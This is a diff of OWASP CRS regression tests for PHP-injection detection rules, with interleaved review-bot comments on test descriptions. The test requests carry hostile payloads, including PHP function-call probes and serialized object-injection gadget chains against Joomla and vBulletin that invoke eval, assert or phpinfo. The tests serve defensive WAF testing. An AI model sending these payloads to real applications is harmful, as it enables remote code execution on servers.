log_contains: id "933160" - - test_title: 933160-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=return%22system%22%28xyz%29.s" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 31 desc: | False Positive test, missing mandatory parenthesis payload: /eval( stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/eval(" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 
933160-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/eval(" + version: "HTTP/1.1" + output: + no_log_contains: id "933160" + - test_id: 32 desc: | False Positive test, missing mandatory parenthesis payload: eval stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=eval" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=eval" + version: "HTTP/1.1" + output: + no_log_contains: id "933160" + - test_id: 33 desc: | False Positive test payload: the files (yep) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20files%20%28yep%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20files%20%28yep%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933160" + - test_id: 34 desc: | PHP mixed case function call with space, LF between (). 
payload: assert_OptionS (\n\n) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 35 desc: | PHP function call `filegroup` with multiple whitespaces. payload: filegroup (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=filegroup%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=filegroup%20%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 36 desc: | PHP function call in URI payload: unpack() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/unpack()" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - 
test_title: 933160-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/unpack()" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 37 desc: | PHP function call in URI, using mixed case payload: unPACK($x) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unPACK%28%24x%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unPACK%28%24x%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml index 8c12ac72f..f59a24858 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml 
@@ -2,92 +2,85 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 933161.yaml tests: - - test_title: 933161-1 + - test_id: 1 desc: regexp; must run test in PL3! stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20checkDate%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" - - test_title: 933161-2 + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20checkDate%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933161" + - test_id: 2 desc: regexp; must run test in PL3! stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=chroot%09%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" - - test_title: 933161-3 + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=chroot%09%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933161" + - test_id: 3 desc: symlink \t() stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=symlink%09%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=symlink%09%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933161" # See https://github.com/coreruleset/coreruleset/pull/3273#issuecomment-1675490075 - # - test_title: 933161-4 + # - test_id: 4 # desc: dl/*foo*/() # stages: - # - stage: - # input: - # data: gethostbynamE( - # dest_addr: 127.0.0.1 - # headers: - # Host: localhost - # User-Agent: "OWASP CRS test agent" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # method: POST - # port: 80 - # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" - # version: "HTTP/1.1" - # output: - # log_contains: id "933161" - - test_title: 933161-5 + # - input: + # data: gethostbynamE( + # dest_addr: 127.0.0.1 + # headers: + # Host: localhost + # User-Agent: "OWASP CRS test agent" + # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # method: POST + # port: 80 + # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" + # version: "HTTP/1.1" + # output: + # log_contains: id "933161" + - test_id: 5 desc: ucfirst() stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=xucfirst%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933161" + - input: + data: gethostbynamE( + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=xucfirst%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933161" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index 9dd5a73be..499134b90 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml 
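Review bot: `desc: regexp; must run test in PL3!` is carried over unchanged for test_id 1 and test_id 2 and describes neither payload, whereas test_id 3 and 5 name theirs; `desc: checkDate(); must run test in PL3!` and `desc: chroot\t(); must run test in PL3!` would match the URIs `/post?%20checkDate%28%29` and `/post?foo=chroot%09%28%29` without losing the PL3 hint. Test_id 5 is the negative case (`no_log_contains`) yet its desc reads `ucfirst()` while the URI sends `xucfirst%28%29`; `desc: xucfirst() must not match (false positive test)` would make the intent visible. Every test, including the negative one, also posts `data: gethostbynamE(`, so the file presumably relies on that body never triggering 933161; if that is deliberate, a one-line comment above `tests:` saying so would stop a future list change from silently breaking test_id 5.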
@@ -2,174 +2,162 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 933170.yaml tests: - - test_title: 933170-1 + - test_id: 1 desc: PHP object injection stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 2 desc: PHP object injection stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 3 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: 
localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize2" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-4 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize2" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 4 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-5 + - input: + data: 
foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 5 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-6 + - input: + data: 
foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 6 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-7 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: 
"/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 7 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize6" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-8 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize6" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 8 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize7" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-9 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: 
POST + port: 80 + uri: "/post/serialize7" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 9 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize8" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-10 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize8" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 10 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize9" - version: "HTTP/1.1" - output: - log_contains: id "933170" + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize9" + version: "HTTP/1.1" + output: + log_contains: id "933170" 
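Review bot: Tests test_id 4 through 10 all send the same body `data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D`, and test_id 3 shows that this body alone (with the payload-free URI `/post/serialize2`) already triggers `log_contains: id "933170"`, so the long URI payloads in test_id 4 and 5 and the differing paths in test_id 7–10 are never what makes those tests pass; test_id 4 and 5 would need a neutral body (or `method: "GET"` with no body) to actually prove the URI payloads are detected, and test_id 7–10 look like repeats of test_id 3 unless the `/post/serialize6`–`/post/serialize9` paths matter to the backend. All ten tests share `desc: PHP object injection`; naming the vector per test (e.g. `desc: PHP object injection, stdClass in GET parameter` for test_id 1) would make a failing test identifiable from its description. As a style point, this file quotes `method: "GET"` in test_id 1 and 2 but writes `method: POST` bare elsewhere; the sibling 933161 hunk uses the bare form throughout.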
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index 570c68e4b..4e685ebfd 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml 
@@ -2,582 +2,544 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 933180.yaml tests: - - test_title: 933180-1 + - test_id: 1 desc: PHP variable functions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=" - version: "HTTP/1.1" - output: - no_log_contains: id "933180" - - test_title: 933180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=" + version: "HTTP/1.1" + output: + no_log_contains: id "933180" + - test_id: 2 desc: $a(1) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24a%281%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24a%281%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 3 desc: $$b(2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24%24b%282%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-4 + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24%24b%282%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 4 desc: $_(3) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24_%283%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24_%283%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 5 desc: '@$__[o](4)' stages: - - 